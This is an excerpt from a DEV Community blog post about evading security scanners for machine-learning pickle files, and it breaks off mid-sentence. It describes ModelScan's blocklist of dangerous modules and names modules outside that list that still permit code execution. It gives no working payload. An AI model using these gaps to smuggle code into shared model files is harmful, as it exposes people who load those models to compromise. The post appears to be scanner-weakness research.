I Found a Way to Bypass AI Model Security Scanners — Here is What I Learned
Machine learning model files can contain arbitrary code. Tools like ModelScan and PickleScan try to detect malicious payloads by scanning for dangerous Python modules in pickle bytecode. I spent a ...

Source: DEV Community
Machine learning model files can contain arbitrary code. Tools like ModelScan and PickleScan try to detect malicious payloads by scanning for dangerous Python modules in pickle bytecode. I spent a week testing these scanners. Here is what works and what does not. How Model Scanners Work ModelScan (by ProtectAI, used on HuggingFace) reads pickle bytecode one opcode at a time, extracting GLOBAL and STACK_GLOBAL imports. It checks these against a blocklist of dangerous modules: os, subprocess, sys, socket — blocked builtins (eval, exec, open) — blocked pickle, shutil, asyncio — blocked If your pickle file imports any of these, the scanner flags it. The Gap The blocklist is finite. Python has hundreds of modules. Several can achieve code execution but are not on the list: importlib — can dynamically import any module at runtime operator — has methodcaller which can invoke any method on any object marshal — can deserialize code objects types — can construct callable functions from code obje